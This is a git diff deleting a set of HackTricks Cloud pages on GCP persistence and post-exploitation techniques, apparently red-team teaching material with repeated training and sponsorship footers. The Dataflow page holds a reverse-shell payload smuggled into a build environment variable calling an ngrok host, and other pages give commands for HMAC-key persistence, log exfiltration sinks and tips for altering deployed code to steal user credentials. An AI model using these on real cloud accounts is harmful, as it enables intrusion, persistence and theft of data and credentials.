-{% endhint %} - -## Cloud SQL - -For more information about Cloud SQL check: - -{% content-ref url="../gcp-services/gcp-cloud-sql-enum.md" %} -[gcp-cloud-sql-enum.md](../gcp-services/gcp-cloud-sql-enum.md) -{% endcontent-ref %} - -### Expose the database and whitelist your IP address - -A database only accessible from an internal VPC can be exposed externally and your IP address can be whitelisted so you can access it.\ -For more information check the technique in: - -{% content-ref url="../gcp-post-exploitation/gcp-cloud-sql-post-exploitation.md" %} -[gcp-cloud-sql-post-exploitation.md](../gcp-post-exploitation/gcp-cloud-sql-post-exploitation.md) -{% endcontent-ref %} - -### Create a new user / Update users password / Get password of a user - -To connect to a database you **just need access to the port** exposed by the database and a **username** and **password**. With e**nough privileges** you could **create a new user** or **update** an existing user **password**.\ -Another option would be to **brute force the password of an user** by trying several password or by accessing the **hashed** password of the user inside the database (if possible) and cracking it.\ -Remember that **it's possible to list the users of a database** using GCP API. - -{% hint style="info" %} -You can create/update users using GCP API or from inside the databae if you have enough permissions. -{% endhint %} - -For more information check the technique in: - -{% content-ref url="../gcp-post-exploitation/gcp-cloud-sql-post-exploitation.md" %} -[gcp-cloud-sql-post-exploitation.md](../gcp-post-exploitation/gcp-cloud-sql-post-exploitation.md) -{% endcontent-ref %} - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/gcp-security/gcp-persistence/gcp-compute-persistence.md b/pentesting-cloud/gcp-security/gcp-persistence/gcp-compute-persistence.md deleted file mode 100644 index 06a63c4e9..000000000 --- a/pentesting-cloud/gcp-security/gcp-persistence/gcp-compute-persistence.md +++ /dev/null @@ -1,45 +0,0 @@ -# GCP - Compute Persistence - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## Compute - -For more informatoin about Compute and VPC (Networking) check: - -{% content-ref url="../gcp-services/gcp-compute-instances-enum/" %} -[gcp-compute-instances-enum](../gcp-services/gcp-compute-instances-enum/) -{% endcontent-ref %} - -### Persistence abusing Instances & backups - -* Backdoor existing VMs -* Backdoor disk images and snapshots creating new versions -* Create new accessible instance with a privileged SA - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/gcp-security/gcp-persistence/gcp-dataflow-persistence.md b/pentesting-cloud/gcp-security/gcp-persistence/gcp-dataflow-persistence.md deleted file mode 100644 index 13153856c..000000000 --- a/pentesting-cloud/gcp-security/gcp-persistence/gcp-dataflow-persistence.md +++ /dev/null @@ -1,79 +0,0 @@ -# GCP - Dataflow Persistence - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## Dataflow - -### Invisible persistence in built container - -Following the [**tutorial from the documentation**](https://cloud.google.com/dataflow/docs/guides/templates/using-flex-templates) you can create a new (e.g. python) flex template: - -```bash -git clone https://github.com/GoogleCloudPlatform/python-docs-samples.git -cd python-docs-samples/dataflow/flex-templates/getting_started - -# Create repository where dockerfiles and code is going to be stored -export REPOSITORY=flex-example-python -gcloud storage buckets create gs://$REPOSITORY - -# Create artifact storage -export NAME_ARTIFACT=flex-example-python -gcloud artifacts repositories create $NAME_ARTIFACT \ - --repository-format=docker \ - --location=us-central1 -gcloud auth configure-docker us-central1-docker.pkg.dev - -# Create template -export NAME_TEMPLATE=flex-template -gcloud dataflow $NAME_TEMPLATE build gs://$REPOSITORY/getting_started-py.json \ - --image-gcr-path "us-central1-docker.pkg.dev/gcp-labs-35jfenjy/$NAME_ARTIFACT/getting-started-python:latest" \ - --sdk-language "PYTHON" \ - --flex-template-base-image "PYTHON3" \ - --metadata-file "metadata.json" \ - --py-path "." \ - --env "FLEX_TEMPLATE_PYTHON_PY_FILE=getting_started.py" \ - --env "FLEX_TEMPLATE_PYTHON_REQUIREMENTS_FILE=requirements.txt" \ - --env "PYTHONWARNINGS=all:0:antigravity.x:0:0" \ - --env "/bin/bash -c 'bash -i >& /dev/tcp/0.tcp.eu.ngrok.io/13355 0>&1' & #%s" \ - --region=us-central1 -``` - -**While it's building, you will get a reverse shell** (you could abuse env variables like in the previous example or other params that sets the Docker file to execute arbitrary things). In this moment, inside the reverse shell, it's possible to **go to the `/template` directory and modify the code of the main python script that will be executed (in our example this is `getting_started.py`)**. Set your backdoor here so everytime the job is executed, it'll execute it. - -Then, next time the job is executed, the compromised container built will be run: - -```bash -# Run template -gcloud dataflow $NAME_TEMPLATE run testing \ - --template-file-gcs-location="gs://$NAME_ARTIFACT/getting_started-py.json" \ - --parameters=output="gs://$REPOSITORY/out" \ - --region=us-central1 -``` - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/gcp-security/gcp-persistence/gcp-filestore-persistence.md b/pentesting-cloud/gcp-security/gcp-persistence/gcp-filestore-persistence.md deleted file mode 100644 index 9710f452c..000000000 --- a/pentesting-cloud/gcp-security/gcp-persistence/gcp-filestore-persistence.md +++ /dev/null @@ -1,47 +0,0 @@ -# GCP - Filestore Persistence - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## Filestore - -For more information about Filestore check: - -{% content-ref url="../gcp-services/gcp-filestore-enum.md" %} -[gcp-filestore-enum.md](../gcp-services/gcp-filestore-enum.md) -{% endcontent-ref %} - -### Give broader access and privileges over a mount - -An attacker could **give himself more privileges and ease the access** to the share in order to maintain persistence over the share, find how to perform this actions in this page: - -{% content-ref url="gcp-filestore-persistence.md" %} -[gcp-filestore-persistence.md](gcp-filestore-persistence.md) -{% endcontent-ref %} - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/gcp-security/gcp-persistence/gcp-logging-persistence.md b/pentesting-cloud/gcp-security/gcp-persistence/gcp-logging-persistence.md deleted file mode 100644 index 05deeb7fa..000000000 --- a/pentesting-cloud/gcp-security/gcp-persistence/gcp-logging-persistence.md +++ /dev/null @@ -1,49 +0,0 @@ -# GCP - Logging Persistence - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## Logging - -Find more information about Logging in: - -{% content-ref url="../gcp-services/gcp-logging-enum.md" %} -[gcp-logging-enum.md](../gcp-services/gcp-logging-enum.md) -{% endcontent-ref %} - -### `logging.sinks.create` - -Create a sink to exfiltrate the logs to an attackers accessible destination: - -{% code overflow="wrap" %} -```bash -gcloud logging sinks create --log-filter="FILTER_CONDITION" -``` -{% endcode %} - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/gcp-security/gcp-persistence/gcp-secret-manager-persistence.md b/pentesting-cloud/gcp-security/gcp-persistence/gcp-secret-manager-persistence.md deleted file mode 100644 index 09a46acea..000000000 --- a/pentesting-cloud/gcp-security/gcp-persistence/gcp-secret-manager-persistence.md +++ /dev/null @@ -1,48 +0,0 @@ -# GCP - Secret Manager Persistence - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## Secret Manager - -Find more information about Secret Manager in: - -{% content-ref url="../gcp-services/gcp-secrets-manager-enum.md" %} -[gcp-secrets-manager-enum.md](../gcp-services/gcp-secrets-manager-enum.md) -{% endcontent-ref %} - -### Rotation misuse - -An attacker could update the secret to: - -* **Stop rotations** so the secret won't be modified -* **Make rotations much less often** so the secret won't be modified -* **Publish the rotation message to a different pub/sub** -* **Modify the rotation code being executed.** This happens in a different service, probably in a Cloud Function, so the attacker will need privileged access over the Cloud Function or any other service. - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/gcp-security/gcp-persistence/gcp-storage-persistence.md b/pentesting-cloud/gcp-security/gcp-persistence/gcp-storage-persistence.md deleted file mode 100644 index ada06789d..000000000 --- a/pentesting-cloud/gcp-security/gcp-persistence/gcp-storage-persistence.md +++ /dev/null @@ -1,64 +0,0 @@ -# GCP - Storage Persistence - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## Storage - -For more information about Cloud Storage check: - -{% content-ref url="../gcp-services/gcp-storage-enum.md" %} -[gcp-storage-enum.md](../gcp-services/gcp-storage-enum.md) -{% endcontent-ref %} - -### `storage.hmacKeys.create` - -You can create an HMAC to maintain persistence over a bucket. For more information about this technique [**check it here**](../gcp-privilege-escalation/gcp-storage-privesc.md#storage.hmackeys.create). - -```bash -# Create key -gsutil hmac create - -# Configure gsutil to use it -gsutil config -a - -# Use it -gsutil ls gs://[BUCKET_NAME] -``` - -Another exploit script for this method can be found [here](https://github.com/RhinoSecurityLabs/GCP-IAM-Privilege-Escalation/blob/master/ExploitScripts/storage.hmacKeys.create.py). - -### Give Public Access - -**Making a bucket publicly accessible** is another way to maintain access over the bucket. Check how to do it in: - -{% content-ref url="../gcp-post-exploitation/gcp-storage-post-exploitation.md" %} -[gcp-storage-post-exploitation.md](../gcp-post-exploitation/gcp-storage-post-exploitation.md) -{% endcontent-ref %} - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-app-engine-post-exploitation.md b/pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-app-engine-post-exploitation.md deleted file mode 100644 index 5c17fd3ec..000000000 --- a/pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-app-engine-post-exploitation.md +++ /dev/null @@ -1,70 +0,0 @@ -# GCP - App Engine Post Exploitation - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## `App Engine` - -For information about App Engine check: - -{% content-ref url="../gcp-services/gcp-app-engine-enum.md" %} -[gcp-app-engine-enum.md](../gcp-services/gcp-app-engine-enum.md) -{% endcontent-ref %} - -### `appengine.memcache.addKey` | `appengine.memcache.list` | `appengine.memcache.getKey` | `appengine.memcache.flush` - -With these permissions it's possible to: - -* Add a key -* List keys -* Get a key -* Delete - -{% hint style="danger" %} -However, I **couldn't find any way to access this information from the cli**, only from the **web console** where you need to know the **Key type** and the **Key name**, of from the a**pp engine running app**. - -If you know easier ways to use these permissions send a Pull Request! -{% endhint %} - -### `logging.views.access` - -With this permission it's possible to **see the logs of the App**: - -```bash -gcloud app logs tail -s -``` - -### Read Source Code - -The source code of all the versions and services are **stored in the bucket** with the name **`staging..appspot.com`**. If you have write access over it you can read the source code and search for **vulnerabilities** and **sensitive information**. - -### Modify Source Code - -Modify source code to steal credentials if they are being sent or perform a defacement web attack. - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-artifact-registry-post-exploitation.md b/pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-artifact-registry-post-exploitation.md deleted file mode 100644 index 4eb194006..000000000 --- a/pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-artifact-registry-post-exploitation.md +++ /dev/null @@ -1,47 +0,0 @@ -# GCP - Artifact Registry Post Exploitation - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## Artifact Registry - -For more information about Artifact Registry check: - -{% content-ref url="../gcp-services/gcp-artifact-registry-enum.md" %} -[gcp-artifact-registry-enum.md](../gcp-services/gcp-artifact-registry-enum.md) -{% endcontent-ref %} - -### Privesc - -The Post Exploitation and Privesc techniques of Artifact Registry were mixed in: - -{% content-ref url="../gcp-privilege-escalation/gcp-artifact-registry-privesc.md" %} -[gcp-artifact-registry-privesc.md](../gcp-privilege-escalation/gcp-artifact-registry-privesc.md) -{% endcontent-ref %} - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-cloud-build-post-exploitation.md b/pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-cloud-build-post-exploitation.md deleted file mode 100644 index 7fc7b5f47..000000000 --- a/pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-cloud-build-post-exploitation.md +++ /dev/null @@ -1,56 +0,0 @@ -# GCP - Cloud Build Post Exploitation - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## Cloud Build - -For more information about Cloud Build check: - -{% content-ref url="../gcp-services/gcp-cloud-build-enum.md" %} -[gcp-cloud-build-enum.md](../gcp-services/gcp-cloud-build-enum.md) -{% endcontent-ref %} - -### `cloudbuild.builds.approve` - -With this permission you can approve the execution of a **codebuild that require approvals**. - -```bash -# Check the REST API in https://cloud.google.com/build/docs/api/reference/rest/v1/projects.locations.builds/approve -curl -X POST \ - -H "Authorization: Bearer $(gcloud auth print-access-token)" \ - -H "Content-Type: application/json" \ - -d '{{ - "approvalResult": { - object (ApprovalResult) - } - }' \ - "https://cloudbuild.googleapis.com/v1/projects//locations//builds/:approve" -``` - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-cloud-run-post-exploitation.md b/pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-cloud-run-post-exploitation.md deleted file mode 100644 index 0e6bdccac..000000000 --- a/pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-cloud-run-post-exploitation.md +++ /dev/null @@ -1,49 +0,0 @@ -# GCP - Cloud Run Post Exploitation - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## Cloud Run - -For more information about Cloud Run check: - -{% content-ref url="../gcp-services/gcp-cloud-run-enum.md" %} -[gcp-cloud-run-enum.md](../gcp-services/gcp-cloud-run-enum.md) -{% endcontent-ref %} - -### Access the images - -If you can access the container images check the code for vulnerabilities and hardcoded sensitive information. Also for sensitive information in env variables. - -If the images are stored in repos inside the service Artifact Registry and the user has read access over the repos, he could also download the image from this service. - -### Modify & redeploy the image - -Modify the run image to steal information and redeploy the new version (just uploading a new docker container with the same tags won't get it executed). For example, if it's exposing a login page, steal the credentials users are sending. - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-filestore-post-exploitation.md b/pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-filestore-post-exploitation.md deleted file mode 100644 index 037d748cf..000000000 --- a/pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-filestore-post-exploitation.md +++ /dev/null @@ -1,130 +0,0 @@ -# GCP - Filestore Post Exploitation - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
